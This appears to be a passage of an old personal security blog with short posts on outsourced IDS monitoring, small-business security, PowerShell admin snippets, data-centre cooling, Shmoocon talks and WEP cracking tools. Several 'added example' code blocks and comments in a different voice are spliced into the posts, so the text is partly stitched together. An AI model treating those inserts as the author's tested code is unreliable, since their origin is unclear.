    While we have a larger and larger IT force doing things like desktop support and making sure the business world still works in the digital world, there is still a huge shortage of the type of geeks who "get it" and can make a difference with truly technical things. This is why the dashboard IDS/IPS has been superficially successful: it doesn't require deep technical knowledge to get and click through alerts. But the knowledge of what those alerts mean is pretty damn spotty, and if the IDS/IPS doesn't support tools to drill down into the mucky darkness of the real technical trenches, that solution is overall just superficial.

    But how do you know your out-sourcer is decent with security? Really, we shouldn't move to make security a commodity that is driven by checklists and statistics without understanding. We need more skilled professionals, even if that means they have an inflated salary for a while and later take a small dip.

    [10:15:40 AM] XXXX-XXXX says: Hey, I'm so glad you guys took over our security monitoring! We had no clue what was going on with the IDS/IPS after the installation techs left. You guys have helped us pass important compliance initiatives and haven't impacted our business at all!

    [10:18:23 AM] SecMonTech04 says: No problem! Looks like we came in just in time too! You had 12,476 alerts in the last month alone, but we've totally taken care of you! Just look how much you needed us!

    [10:19:49 AM] XXXX-XXXX says: Sweet mother of all that is good and pure, that's a lot! Whew! By the way, is that the number of alerts after you've tuned the monitoring?

    [10:20:45 AM] SecMonTech04 says: Uh, yes.

    [10:22:27 AM] XXXX-XXXX says: What did you all tune out?

    [10:23:33 AM] SecMonTech04 says: Um, we ignore ARP alerts because it's really just too noisy.

    [10:24:12 AM] XXXX-XXXX says: That's it?

    [10:24:56 AM] SecMonTech04 says: I believe so...

    [10:26:43 AM] XXXX-XXXX says: This is kind of odd. How many of those alerts are important enough to warrant further investigation or worry and wouldn't ever be tuned out by anyone?

    [10:29:42 AM] SecMonTech04 says: Looks like about 3...maybe 6 if I am paranoid.

    [10:30:31 AM] XXXX-XXXX says: That's it?

    [10:31:21 AM] SecMonTech04 says: Oh, and we're not really monitoring much on incoming port 80 because there's too many application level attacks that we don't want to give you a false sense of security about if we said we protected port 80.

    [10:32:22 AM] XXXX-XXXX says: Huh? Why the hell not??

    [10:34:45 AM] SecMonTech04 says: By the way, did you read the latest alerts from the anti-virus companies? The Internet is falling apart and is being overrun by hooligans and criminals. You better be glad you have us!

    [10:37:32 AM] XXXX-XXXX says: Hold on a minute, back up. You're not tuning anything out and not monitoring what might be one of our most important incoming ports. Are you actually blocking any attacks at all?

    [10:39:12 AM] SecMonTech04 says: No, we're operating in IDS-only mode. We don't want to risk negatively impacting your business and cause you to distrust and dislike us.

    [10:44:41 AM] XXXX-XXXX says: Oh god, I need some Tums...

    [10:49:40 AM] XXXX-XXXX says: You realize we will need to start blocking some things?

    [10:51:40 AM] SecMonTech04 says: Tell you what, we will turn on blocking (IPS mode) for all incoming ports between 55000 and 58000. Will that be enough?

    [10:53:11 AM] XXXX-XXXX says: Whew, I think that will be ok...glad you guys are the experts.

    [10:55:54 AM] SecMonTech04 says: Actually, we hire not only the inept techs you let go because you outsourced security, but we also employ interns who just click "ok" to every alert that comes in. They don't really know what this means either.

    [10:56:30 AM] XXXX-XXXX says: ...I'll assume you meant to type that in another window.

    [10:59:10 AM] SecMonTech04 says: Oops, yes I did, sorry.
    .: beating up on small business security
    I read a few bits in a row today about small business security which made me kinda sit back and decide I disagree. I read a piece from Andy, another from Rothman, and another that Rothman pointed to over at SmallBizResource. I'm sure I'll read some more in the next few days as I attempt to get caught up on my reading in this rather busy week. For now, let me rant a bit and enjoy some foam being flung from my lips.

    First, security is easier than a red-headed step-child to get mad at (that's so un-PC, but that's why I'm not a professional blogger...). You can poke holes at it until you turn blue and the sky turns into pudding. That's the nature of the beast we attempt to control and tame every single day, and the grim reality is there will always be holes and improvements and places where we can say, "they don't get it" or "they're not taking care of security." By the way, eventually business is going to tire from this fact that we can always criticize and give security exceptions; eventually this will bite us in the ass as business "settles" for checklist security and nothing more. (But I guess we at least get that far, eh?)

    Second, securing a Fortune 50 is a hell of a lot different than securing a 500-person company which is also different from securing a 50-person company. In fact, I really think securing those smaller companies would actually be easier given a knowledgeable geek. Just like in warfare, they are nimble, quick, have a low profile, and tend to be pretty unpredictable and all without the slow-moving girth of a politically-motivated blimp. In other words, I don't think size correlates with security on any other level than coincidental. I don't think there's causation here. (More on this later.)

    I still keep my list of the top 5 things I would suggest all small businesses do, not to become compliant with PCI or some other checklist, but to rather make big strides towards security. These 5 things can make a huge move towards being more secure, especially for a small business. They're not really that hard, and I think we overestimate the number of companies who don't do them (and yes, that's coming from me, the skeptic who thinks all companies are basically fucked and full of holes, if not from an outside perspective, then from an insider).

    Third, I really don't think the article on SmallBizResource paints with the right colors. The article attempts to paint that SMBs are doing poor security by holding up that many of them are "currently storing sensitive customer data that they are supposed to purge after a transaction is complete under the Payment Card Industry (PCI) Data Security Standard." So? This is a problem with checklist security. So what if they are storing data? How are they storing that data? So what if their front door is unlocked when they have a mantrap, cameras, and internal doors protecting other areas of the company? The act of storing data adds to risk and may be against a compliance regulation, but that is not necessarily insecurity at work. Likewise, not following a security guideline and instead working by common sense can be just fine...unless you want to assume that no one has good common sense. I know I don't follow some blueprint for my own home security and instead follow some common sense, but that itself doesn't mean I'm insecure. And what if they don't store that data but also don't have a properly configured firewall and anti-virus software? Yes, at least they're not going to hemorrhage millions of credentials, but they are certainly not secure.

    Fourth, I said I would get back to my comment on how size does not necessarily correlate to security. I truly think security is a function of the quality and intelligence of our security and IT professionals. We need more quality people securing things and running IT and managing the data. Andy brushed up against this in his post. I don't think SMBs don't get it because they're SMBs or have fewer employees or fewer resources, per se. I think they don't get it because their IT staffers don't get it and haven't had a chance to get it. There's still an awful, awful number of IT techs who are still learning just how to DO things, let alone do them in a secure fashion.
    .: the amazing ability to post best ofs and top lists on the webs
    I've been refraining from posting on this since I didn't think it a big deal, but I've seen far too many other sites posting about the "59 Top Influencers in IT Security."

    Absolutely no offense to anyone on that list, but here are a few things wrong:

    1) That list is not new, in fact, I found and used that list about 4-6 months ago when looking for more blogs to add to my RSS feeds. It was billed as just someone's list of security blog links. It has only just now been rebranded as a "top of" list. Amazing what a simple title change can do for how distributed it can become. :)

    2) Fyodor was misspelled back then as well, and I distinctly recall that.

    3) If you read some of the small captions, you'll wonder if the author even reads the blogs/people they are talking about. I especially liked Bejtlich's and Maynor's entries.

    4) Some people are left off that shouldn't have been, and others were included that kinda make you go, "Hmmm." Some of the most important names made the list but only as a "here's the rest" mention.

    Anyway, I really didn't want to post that but it's been on the top of my head the last couple days, especially since I keep reading entries about it on my favorite sites. No matter what, that list is still a great resource to plunk all those sites and blogs into your favorite RSS tool and keep up with our industry.
    .: trackback spam attempts
    Has anyone else out there noticed sudden activity against MovableType's trackback (mt-tb.cgi) function? Yesterday afternoon and this afternoon my server suddenly stopped responding. Both times this was immediately preceded by a small flood of disparate sources attempting to post trackbacks (which I have disabled). My logs show nothing but onesy-twosy attempts over the past 6 months, months apart.
    .: career skills and scope - a small ramble
    Michael posted a comment just a bit ago that got me thinking. I'm very open to this sort of stuff right now because it is a position I am in. I am sponging up everything I can learn still on a rather broad scale, and I am also not in a job that I see myself sticking another year in. I guess, like Bridget Jones with relationships, I'm looking for something extraordinary that adds to my life, as opposed to sucks away 8 hours or more a day. There's plenty out there, so it is a waste to stay in something that doesn't fit the bill.

    So part of Michael's post was:
    I thought I'd be a shoe-in but alas, everyone was looking for the Exchange-SQL-Checkpoint-Oracle-Linux-Unix-and-all-the-Windows-versions guy. Sucks to be me I guess.
    That's too true. I really hate those ads and people who are expecting an IT guy to know 15 mainstream things and then an additional 5 rather small tools or technologies. And then to only have 2-4 years of experience and get paid a barely competitive level. What the hell?

    It is important to realize one's limitations and skills when looking for an IT job these days. Do I know all 20 tools? Or better yet, do I have the capability to learn the tools I don't know at the moment? Is the company (manager) looking for someone who can grow into those roles, or already knows them at that level?

    And that's where I am today. I am keeping myself broad and rather open and knowledgeable about a hell of a lot of things in IT and security, but have yet to really dive in and get to be an expert in any one (then again, I am likely harder on myself than others are on me, so others may consider me nearly expert whereas I think I have a ways to go...).

    This way, when I find that job that truly adds to my life, I can adapt to it and see what opportunities are presented to me. For instance, if I happen to get a job that opens doors to web app security, I can quite happily dive into it feet first. Likewise with something like PCI/DSS.

    By the way, yes, that means I may post my resume somewhere around here in the near future. If you want to see it or offer suggestions or see what I did as inspiration in your own, feel free to email or IM me and I'd be happy to give it out.
    .: just a little more apple wireless drama
    George Ou posted what I hope is the last commentary on the Apple wireless debacle from last year, which I still think was the biggest security news of 2006. What I like about Ou's article is how unassuming it is (the digs on Apple aside). I watched the Maynor video last year when it broke and never once thought they were attacking Apple directly. Anyone who watched the video could have seen that.

    The problem came from the "blogosphere." Everyone wants to trump others and so when news breaks they attempt to make the most sensational deal about it; a case of news "reporters" trying to make news instead of just reporting it. Pretty quickly, one post claims an attack on Apple, and another one claims lying and scandal, and everyone starts posting willy-nilly third-, fourth-, and fifth-hand information without really knowing jack. Pretty soon, small responses of wrong-doing are muffled out by the masses clamoring and all up in passionate arms about a non-issue.

    Ethics in blogging is going to continue to be an interesting topic. In addition, ethics in information usage will be interesting. Throughout history the victors have always written history and made the laws and beliefs. But what about things like Wikipedia? What if they get something wrong? But what if 98% of people believe it to be fact when it really is false? Can that wronged person ever prevail, or does majority (the victor) rule? Interesting questions in our new age...
    .: a wild, wild ride
    Holy crap, there's a ton of first year birthdays going on in my rss feeds reader from bloggers. Hell, even RSnake hasn't been around a year! This is just crazy since I could have figured a lot of people had been around longer. It kinda puts some things in perspective, since I've been documenting my day to day "stuff" here or on my personal site since late 2001 when I installed my first news script (no blogs back then!) on my website which, itself, I had maintained since late 1996. It's been a wild ride since then, and obviously I am not one to bang on the door for hits and visitors. :)

    Grats to all those people with baby blogs that are starting to grow up and find their identity or realize that they had an identity long ago and can stand just fine as themselves!
    .: more pruning of links
    It's time again to prune some more links. I've been seriously contemplating moving a lot of my links on the right menu over to a page on my wiki. I've yet to do that so far, and I think I've talked myself into leaving them here. I just wish I had less links since they do get pretty long, however, I use a significant portion of them regularly; sort of my own little personal portal (hence why I would move the portal part to a wiki page). Of course, then my page might look a little bare...I guess I could fill the space with vertical Google ad bars! Hehe, no thanks.

    Haxorthematrix seems to have gotten lost in the new year. Info-pull has disappeared as well with few updates. I know just barely over one month of no updates is really being picky, but I'm more picky with more personal blogs and especially those that have not been up more than a year. I'm very aware of the tendency of people to start strong on an endeavor, and then putter out after a few months.

    SecurityBullshit is being removed, but only because Mark has merged it with his other blog, SecurityBuddha. I totally dig that name, and I think it interesting the sort of zen way of life that can be found in parts of the computer security industry, from techbuddha to securitybuddha to taosecurity...I wonder if zensecurity is taken? Considering I am highly sympathetic to the Buddhist (and related) way of life and philosophy, I really have this odd little affinity to such sites. Oh, and securityzen.net is not taken! I might have to think about grabbing something like that someday, for possible future branding. Until then, I'm really happy with Terminal23.

    The O3 e-zine seems to have disappeared after 3 colorful issues through the first few quarters of last year. I really liked this zine's focus on Open Source, but it really was just the same thing as (in)secure and uninformed (how's that for a combo phrase?!) when you get down to it.

    The list of top 10 security live cds from DarkNet is starting to look dated, especially as BackTrack2 is now out and really kinda dominates this field (minus general livecd and forensics offerings). Besides, I have moved this to my own live cd list on my wiki anyway. I don't use VMyths, so why bother with the link, especially as I try to get this list down a bit (of course, for every one I remove, I seem to add another...). Church of the Swimming Elephant is a classic site that still has lots of useful stuff. Sadly, it continues to grow more and more dated. If you've not gone there, go there and browse the info and wares. Definitely harkens back to a more innocent time in hacking!

    A reverse engineering site that I never really visited seems to have also disappeared. I also never visit the ProfessionalSecurityTesters site. Besides sounding a little off, the site itself just never sat well with me and I never really went back.
    .: powershell snippet to test server names
    I've been doing some scripting at work and had a desire to test if a server exists before attempting to do some work against it (less errors, cleaner execution...). I hadn't found anything that I wanted to use so I asked in the #powershell channel on irc.freenode.net. MoW, of course, knew the answer since he is the Google of PowerShell. Give him a question and he'll throw out the answer.
    shell> $ping = new-Object System.Net.NetworkInformation.Ping
    shell> $ping.Send('localhost').status
    Success
    shell> $ping.Send('blah').status
    Exception calling "Send" with "1" argument(s): "An exception occurred during a Ping request."
    Update: Gaurhoth gives some information comparing Win32_PingStatus with the above method.
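    The snippet above throws on 'blah' because the name never resolves, so a bare call cannot be used as a yes/no check inside a script. Here is an added example (my own code, not MoW's snippet or Gaurhoth's post) that wraps both approaches mentioned in this post as functions returning a boolean: the .NET Ping class with the exception caught, and a Win32_PingStatus query via WMI. It assumes PowerShell 2.0 or later for try/catch and Windows PowerShell for Get-WmiObject; the server names at the bottom are just the ones from the post.

```powershell
# Added example: two boolean "is this server there?" checks.
# Assumes PowerShell 2.0+ (try/catch) and Windows PowerShell (Get-WmiObject).

function Test-ServerAlive {
    param([Parameter(Mandatory=$true)][string]$Name, [int]$TimeoutMs = 1000)
    $ping = New-Object System.Net.NetworkInformation.Ping
    try {
        # Send() throws PingException when the name does not resolve; a timeout or an
        # unreachable host instead comes back as a reply whose Status is not Success.
        $reply = $ping.Send($Name, $TimeoutMs)
        return ($reply.Status -eq [System.Net.NetworkInformation.IPStatus]::Success)
    } catch {
        return $false
    } finally {
        $ping.Dispose()
    }
}

function Test-ServerAliveWmi {
    param([Parameter(Mandatory=$true)][string]$Name)
    # $Name is spliced into a WQL string; doubling single quotes keeps a stray quote
    # in the argument from altering the query.
    $safe = $Name -replace "'", "''"
    $status = Get-WmiObject -Query "SELECT StatusCode FROM Win32_PingStatus WHERE Address='$safe'"
    # StatusCode 0 means a reply was received; any other code (or no object at all,
    # which is what an unresolvable name produces) counts as down.
    return ($status -ne $null -and $status.StatusCode -eq 0)
}

# Usage: the two names from the post ($host is an automatic variable, so avoid that name).
foreach ($server in 'localhost', 'blah') {
    "{0,-12} .NET: {1,-5} WMI: {2}" -f $server, (Test-ServerAlive $server), (Test-ServerAliveWmi $server)
}
```

    One caveat for either method: a host that silently drops ICMP (Windows Firewall does this by default on many profiles) reports as down even though the service you actually care about may be listening, so for anything beyond "does this name resolve and answer" you want a TCP connect to the real port.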
    .: cybersecurity defense requires a good offense?
    We've yet to see this come to a head, but I bet it will be soon. An article I read today contained a few tidbits about cyber warfare:
    History teaches us that a purely defensive posture poses significant risks, Cartwright told the committee. He [Marine Gen. James Cartwright, commander of the Strategic Command] added that if we apply the principle of warfare to the cyberdomain, as we do to sea, air and land, we realize the defense of the nation is better served by capabilities enabling us to take the fight to our adversaries, when necessary, to deter actions detrimental to our interests.

    Cartwright said U.S. adversaries in cyberspace include other countries, terrorists and criminals who operate behind what he described as technical, legal and international screens, and he said that if we are to take the fight to our adversaries, we will need Congress's help finding solutions to penetrate these screens...
    [Lt. Gen. Robert Elder Jr., commander of the 8th Air Force and JFCC-Global Strike and Integration] did not detail plans for going on the offensive. But when asked about it, he said, "We will probably do some of that, by the way."
    We might be going on the offensive? Are we actually at war in a way that we can go on the offensive as if we were on the sea, air, or land? I really wonder if that will be seen as a hostile action or not, or if this is all still just contested territory. I don't have much thought on this right now, but as the years move forward, this cyber conflict could pose ramifications on the openness and neutrality of our Internet.
    .: no sooner do I finish my windows server...
    No sooner do I finish up on my Windows server...now I'm using an older 400MHz box to start standing up an Ubuntu server to start using stuff there. While I like stability for the things I use daily, I really want to learn more, so rather than languish my stuff on Windows for a few years, I'm moving on already.

    The first thing I want to move over are the things I use cygwin/Windows for, namely my SSH server. My SSH server gets quite a few hits, strangely Amsterdam is outpacing Asia in SSH auth attempts. If you let that page load, you can see all the attempted login names. Since I am running SSH on cygwin, I don't even use "root" or "admin." I'm surprised that "Administrator" is not used more, since that is what cygwin pulls in (it mirrors the Windows accounts). If someone can do that small battery of attempts, it is trivial to add "administrator" to that initial slam.

    Anyway, yes, my next project is to start standing up and getting more familiar with running certain apps on Linux. SSH is not going to be an issue, and I'd like to leverage Linux to analyze my Apache log files and other neat things on my network. On a more advanced note, I want to throw sendmail or another nix mail server up as well. I like my current mail server, but the image spam is just not terribly fun and spam solutions on Windows are not as impressive to me as nix solutions. Besides, I want to be exposed to more. I spent years in my comfort zone and it's paying off to try out new things. This box also now has a 200GB HD and has always had 2 NICs, which plays right into my hands to get Snort on a nix box and familiarize myself with some more monitoring tools.

    That's how my spring is shaping up, and what has been stealing my time lately.
    .: 10 immutable laws of security administration
    Snagged this from Sean's blog. I swear I have seen this before or maybe even posted about it, but couldn't find it. Either way, it's a nice set of "laws" and in the same vein as the 10 immutable laws of security.

    Law #1: Nobody believes anything bad can happen to them, until it does
    Law #2: Security only works if the secure way also happens to be the easy way
    Law #3: If you don't keep up with security fixes, your network won't be yours for long
    Law #4: It doesn't do much good to install security fixes on a computer that was never secured to begin with
    Law #5: Eternal vigilance is the price of security
    Law #6: There really is someone out there trying to guess your passwords
    Law #7: The most secure network is a well-administered one
    Law #8: The difficulty of defending a network is directly proportional to its complexity
    Law #9: Security isn't about risk avoidance; it's about risk management
    Law #10: Technology is not a panacea
    .: mesh security
    There is some interesting talk going on about mesh security over on Nate Lawson's blog. Really cool stuff, although I don't understand it quite well enough yet to regurgitate the topic on here, so just check out the link. Also, Matasano and Bejtlich have added to the discussion.
    .: oh such lovely silica you have
    Dave Aitel posted to DD a link to a review of SILICA. SILICA is awesome and one of those gadgets I really want to get my hands on. But at a price of $3600, it is definitely a major purchase for someone like me; just low enough to be doable, but higher than even a good laptop or gaming rig with far fewer uses. Nonetheless, if this device stays current and highly supported by Immunity for many ongoing years, I really am going to plan on picking this up in the next year or just after (my car gets paid off next summer which means some freed up monies...).
    .: warm under the collar
    From an article:
    About 11 buildings have lost air conditioning because of the failure, Stone said. The problem threatens to overheat computer servers, and officials are warning that the state's main web page will be out of service periodically throughout the day.
    It is hard to realize how important cooling is in a data center or even a small switch room until the AC cooling said room goes out. It can heat up pretty fast if you're not decisive and that can really cripple business.

    How do you plan for such an event?

    - Make sure you have redundant cooling solutions; while you might not need multiple heavy industry coolers, at least have something available to either vent warm air or introduce cool air. While normal fans are absolutely no replacement for AC cooling, moving air is better than stagnating warm air.

    - Keep AC repair service numbers or contracts readily available for quick remediation.

    - In your inventory of servers and systems and services, make sure you know which ones are critical and which ones are expendable over short periods of time. Just like trying to milk juice out of your UPS in a power outage, you want to milk the temperature in your server room as long as possible. Shut down all unnecessary servers and devices to minimize heat generation. Be ready to determine when critical temps are reached that will almost certainly damage equipment and/or data and be prepared to invoke a business continuity plan or...be ready to have the company take the day off...
    .: use powershell as a real powered up shell
    PowerShell is pretty cool so far, even if the remote capability requires some heavy scripting/.NET experience for now. I just found out today that I can actually write functions, put them into my profile file (My Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1), and have them load on start-up. This means my little function to start and stop remote services can be a simple one-line job and always preloaded, kinda like my own little command shell. Type $profile to make sure you have the right location. Mine is weird since I start mine with network admin privs as opposed to my normal workstation account.
    Windows PowerShell
    Copyright (C) 2006 Microsoft Corporation. All rights reserved.

    RemoteServices loaded

    PS C:\Documents and Settings\mdickey> remoteservices
    usage: RemoteServices [servername] [Stop|Start|Check|List|GetName] [service name]
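    The post shows the usage line but not the function itself, so here is an added example of a RemoteServices function that matches that usage line and can be pasted into $profile. It is my own illustration, not the author's function, and it assumes Windows PowerShell (Get-WmiObject), WMI/DCOM reachable on the target server, and an account that is an administrator there; the Win32_Service StartService/StopService methods return 0 on success.

```powershell
# Added example: a RemoteServices profile function driven by WMI (Win32_Service).
# Assumes Windows PowerShell, WMI reachable on $Server, and admin rights there.
function RemoteServices {
    param([string]$Server, [string]$Action, [string]$Service)

    if (-not $Server -or -not $Action) {
        "usage: RemoteServices [servername] [Stop|Start|Check|List|GetName] [service name]"
        return
    }
    # $Service is spliced into a WQL filter; doubling single quotes keeps a stray
    # quote in the argument from changing the query.
    $safe   = $Service -replace "'", "''"
    $byName = "Name='$safe'"

    switch ($Action) {            # switch on strings is case-insensitive by default
        'List'    { Get-WmiObject Win32_Service -ComputerName $Server |
                        Select-Object Name, State, StartMode | Sort-Object Name }
        'GetName' { Get-WmiObject Win32_Service -ComputerName $Server -Filter "DisplayName LIKE '%$safe%'" |
                        Select-Object Name, DisplayName }
        'Check'   { $svc = Get-WmiObject Win32_Service -ComputerName $Server -Filter $byName
                    if ($svc) { "$($svc.Name) on $Server is $($svc.State)" }
                    else      { "no service named '$Service' on $Server" } }
        'Start'   { $svc = Get-WmiObject Win32_Service -ComputerName $Server -Filter $byName
                    if ($svc) { $r = $svc.StartService(); "StartService on $Server returned $($r.ReturnValue) (0 = OK)" }
                    else      { "no service named '$Service' on $Server" } }
        'Stop'    { $svc = Get-WmiObject Win32_Service -ComputerName $Server -Filter $byName
                    if ($svc) { $r = $svc.StopService(); "StopService on $Server returned $($r.ReturnValue) (0 = OK)" }
                    else      { "no service named '$Service' on $Server" } }
        default   { "unknown action '$Action'" }
    }
}
"RemoteServices loaded"
```

    Once this lives in the profile, `remoteservices fileserver01 check Spooler` is the whole command. Because anything in $profile runs with whatever rights the shell was started with, keep the profile file writable only by your own account; a writable profile is an easy place for someone else to plant code that runs every time you open an admin shell.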
    .: operating system vulnerability comparison
    OmniNerd posted a rather lengthy article comparing various default installations of most modern operating systems (released in 2006, I think) using nmap and nessus to determine the vulnerability of said distributions to remote attacks. While simplistic in assessment and lengthy in discourse, the biggest takeaway I got from this article in my brief skim aligns with what I believe anyway. Operating systems have weaknesses, strengths, and problems, but ultimately it is a knowledgeable and diligent admin that makes a system secure (or more secure, if you will), and normal users can turn an OS into swiss cheese very easily.
    .: appliedsec shmoocon challenges
    If you have time to check this out or you don't and still want to learn something (shame on you!) then pick up Applied Sec's Shmoocon challenge notes and the solutions. I don't think they'll be up for a terribly long time, especially the server, so don't delay. Upon first glance, these challenges look to be a little more varied and interesting than most of the web-based "hacker challenge" sites out there.
    .: windows mobile tools
    I almost bought a Linux-based PDA earlier this year (Zaurus 5500 or 6000) and I still might, but after reading what is now available for Windows Mobile from both Justin Clark and Andre Gironda, I might have to add a newer Windows Mobile device for myself this year. I hadn't realized tools had come this far! There are more notes here and likely elsewhere if I were to look.
    .: a gaming rig on a budget of $1500
    If you're a sec geek, you're also likely a gaming geek on some level. And if you do any amount of PC gaming, you'll likely be building your own systems unless you have extra money to throw at pre-built systems from vendors. And while I'm not in the market to fully upgrade my gaming rig right now, it really helps to casually read up and stay at least somewhat current with what is going on in the PC building gaming market. This article by Corsair is not just a guide to buying bargain gaming parts that still scream performance, but the guys actually go through (with lots of awesome screenshots) overclocking, BIOS settings, benchmarking tools and examples, and even suggestions on different parts. (Personally, I'd swap that frickin' huge heatsink with a watercooling model.)

    In true HardOCP fashion, you can also head to the comments of their news byte on the article and check out some reactions.

    On third thought, it wouldn't hurt to maybe pick up a few parts now and file this guide away...
    .: kicking wep while it is down
    WEP is already known to be broken and weak, but I see Aircrack-ptw is a new tool out that purports to break WEP (most implementations anyway) much quicker. I have not yet tried it, because BackTrack 2 decided to be a bugger about my Hermes Orinoco card and I have yet to replace it or find a solution (Whoppix and BT1 are fine with it, go figure), but once I get that squared away I plan to check this tool out. There is a paper linked on the site, and while some of it gets into some deeper mathematical (mathematical sure sounds more haughty than "math," eh?) theory, some sections are still concise and informative (1, 5, 8, and 9).

    Update: I see ISC has also been made aware of this, although they link just to the paper.
    .: some basics of windows performance tweaking
    For any practicing sysadmin, sometimes you just have to tweak servers to milk a little bit more performance. Sometimes the good ol' basics are still the best things to do. I liked these steps (mostly) from SearchWinComputing. I'll just give my own notes on the steps.

    1. Use a dedicated drive for the pagefile. This makes sense.

    2. Keep your hard disks defragmented. I don't do this much, but when trying to milk a bit more performance out of a server, defragging is still a low-hanging fruit to try out.

    3. Use the NTFS file system. I wouldn't think to do otherwise, not from a performance standpoint necessarily, but definitely for security.

    4. Avoid running 16-bit applications. Ok.

    5. Look for memory leaks. Basically need to continuously monitor memory usage to catch this. Sometimes apps (like ASP) will automatically recycle themselves and clean up, thus lowering the indications of a memory leak. Once a process is identified that has a leak, research it on Google or with your own teams if it is homegrown.

    6. Remove seldom-used utilities. I would also suggest making sure server software is inventoried and reviewed regularly. That way when some piece is no longer needed, it can be identified and removed. But yes, it sucks to see unused things running on a server.

    7. Disable unused services. A tried-and-true best practice for...just about everything.

    8. Log off. Makes sense to me!

    9. Compress the hard disk. The author makes a decent case for this, but I would definitely only do this in conjunction with baselining performance and testing after each change otherwise this could be detrimental.

    10. Adjust the server response. i.e. Adjust background applications for a higher priority.

    .: an interesting issue in powershell
    I am scripting some file syncing and having a frustrating time. The biggest issue is trying to work around a few files that are flagged as "read-only." In the examples, assume sourcefile.txt is "read-only."

    PS> copy-item sourcefile.txt c:\sourcefile.txt -force
    If this is the first time copying, this will work just fine because the destination file is new.
    PS> copy-item sourcefile.txt c:\sourcefile.txt -force
    This will now give an error because c:\sourcefile.txt is read only.
    PS> move-item sourcefile.txt c:\sourcefile.txt -force
    This will always work.

    While this isn't so bad, I don't want to move folders over without first going through them to make sure the new folder isn't leaving out something from the old folders, if that makes sense.

    So far, my solution is way more complex than I think it should be. I read through all folders and determine if the folder is new or already exists at the destination. If it is new, I move-item it over. I then copy all non-containers that are left. Then I remove all the leftover source containers. Please excuse the variable names and lack of tabs showing up.
    $shortpathdest = "\\SERVER\FILES\Installed"
    $shortpathsource = "\\SERVER\FILES\ToInstall"

    # Pass 1: folders. Any folder that does not yet exist at the destination is moved
    # whole (which carries everything under it along in one go).
    $items = get-childitem $shortpathsource -recurse | where  {$_.psIscontainer -eq $true}
    
    If ($items)
       {
          foreach ($i in $items)
             {
                # Strip the source root to get the relative path, then rebuild it under the destination.
                # Note: String.Replace is case-sensitive, so $shortpathsource must match the casing
                # that get-childitem reports in FullName.
                $fullsourcepath = $i.FullName
                $fullsourcepath = $fullsourcepath.Replace($shortpathsource,"")
                $fullpathdest = $shortpathdest + $fullsourcepath
    			
                # A subfolder already carried over with its parent now exists at the destination,
                # so it simply falls through here.
                If (test-path $fullpathdest){ }
                Else { move-item $($i.FullName) $fullpathdest -force }   # original had $longpathdest, an undefined variable
             }
       }
    
    # Pass 2: files. Every parent folder now exists at the destination, and move-item -force
    # overwrites even a read-only target, which copy-item -force would not.
    $items2 = get-childitem $shortpathsource -recurse | where  {$_.psIscontainer -eq $false}
    If ($items2)
       {
          foreach ($i in $items2)
             {
                $fullsourcepath = $i.FullName
                $fullsourcepath = $fullsourcepath.Replace($shortpathsource,"")
                $fullpathdest = $shortpathdest + $fullsourcepath
                move-item $($i.FullName) $fullpathdest -force
             }
       }
    
    # Pass 3: whatever is left at the source is empty folder shells; clear them out.
    Remove-item $shortpathsource\* -recurse -force
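    The root of the trouble above is the ReadOnly attribute on the destination file: copy-item -force creates the file fine the first time, but the copy inherits the source's ReadOnly flag and the next overwrite fails. Here is an added example (my own code, not the post's script) of a copy helper that clears that flag on the destination before copying, so a plain copy-item can be used for the whole sync without the move/remove dance. It assumes PowerShell 2.0 or later and builds its own scratch files under $env:TEMP; the file names are just the ones from the post.

```powershell
# Added example: overwrite a read-only destination file with Copy-Item -Force.
# Assumes PowerShell 2.0+. Scratch files are created under $env:TEMP.

function Copy-ItemOverReadOnly {
    param([Parameter(Mandatory=$true)][string]$Source,
          [Parameter(Mandatory=$true)][string]$Destination)

    if (Test-Path -LiteralPath $Destination -PathType Leaf) {
        $dest = Get-Item -LiteralPath $Destination
        if ($dest.IsReadOnly) {
            # Clearing ReadOnly on the *destination* is what lets -Force succeed;
            # the source file's own attribute does not matter for the overwrite.
            $dest.IsReadOnly = $false
        }
    }
    Copy-Item -LiteralPath $Source -Destination $Destination -Force
    # The fresh copy carries the source's ReadOnly flag again, which is why a
    # second run would fail without this helper.
    return (Get-Item -LiteralPath $Destination).IsReadOnly
}

# Usage: constructed scratch layout mirroring the post's sourcefile.txt case.
$work = Join-Path $env:TEMP 'ro-copy-demo'
$src  = Join-Path $work 'sourcefile.txt'
$dst  = Join-Path $work 'dest\sourcefile.txt'
New-Item -ItemType Directory -Path (Split-Path $dst) -Force | Out-Null
'v1' | Set-Content -LiteralPath $src
(Get-Item -LiteralPath $src).IsReadOnly = $true      # make the source read-only, as in the post

"first copy, destination is new;      dest read-only afterwards: " + (Copy-ItemOverReadOnly $src $dst)
"second copy, destination read-only;  dest read-only afterwards: " + (Copy-ItemOverReadOnly $src $dst)
Remove-Item -LiteralPath $work -Recurse -Force
```

    The same check works for the file pass of the sync script: test the destination's IsReadOnly, clear it, then copy-item -force. That leaves the source tree intact until you have verified the destination, which is the part the move-based version gives up.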
    .: shmoocon 2007
    Some of the Shmoocon 2007 presentations have been posted. There's a few, and maybe not all of them will be interesting, so I thought I would provide my feedback here (and ongoing) on the talks I checked out, plus a quick impression of what I thought about it.

    I really wish I had attended Shmoocon, but I'm not really at a place right now where I could. I really wish I had heard about it back in its first year, 2005, as I was in DC at the time on business. Sadly, I didn't learn about Shmoocon until after I had gotten back (and I was housed in a hotel very close to it as well!). At any rate, I'll still whore up the presentations online and still get something out of it. Overall, I really dig the vibe from Shmoocon. It is serious about security but in a fun, friendly, personal kind of way that I think best resembles early Defcon or perhaps CCC. Smart, awesome, but not hoity-toity and "commercialized" or too anonymous.

    Opening Remarks.mp4 - If you want to learn a little bit more about Shmoocon and what it's all about, this is a useful talk from Bruce Potter of the Shmoo Group and runs a half hour.

    Hacking the Airwaves with FPGAs - h1kari.mp4 - 20 minute presentation about cracking WEP and WPA (and FileVault and Bluetooth PINs) using different hardware pieces (FPGA) to speed things up. While that is interesting, the hardware itself is pretty spendy. If you've not seen his talk before or know anything about FPGA, watching a longer presentation may be more helpful, but his demos are quick and do work in this one. Tools: jc-wepcrack for WEP, coWPAtty for WPA, vfcrack for FileVault, btcrack for Bluetooth PINs.

    No-Tech Hacking - Johnny Long - Johnny is a very cool presence and typically includes a lot of really awesome audience participation where he presents pictures and asks for feedback. This is no different and he presents a lot of pictures and asks, "What does a hacker see?" This is about observation skills, information gathering, opening your mind. I can just also say, "the driver has candy."
    .: shmoocon - simple nomad and clarke
    More Shmoocon 2007 presentations.

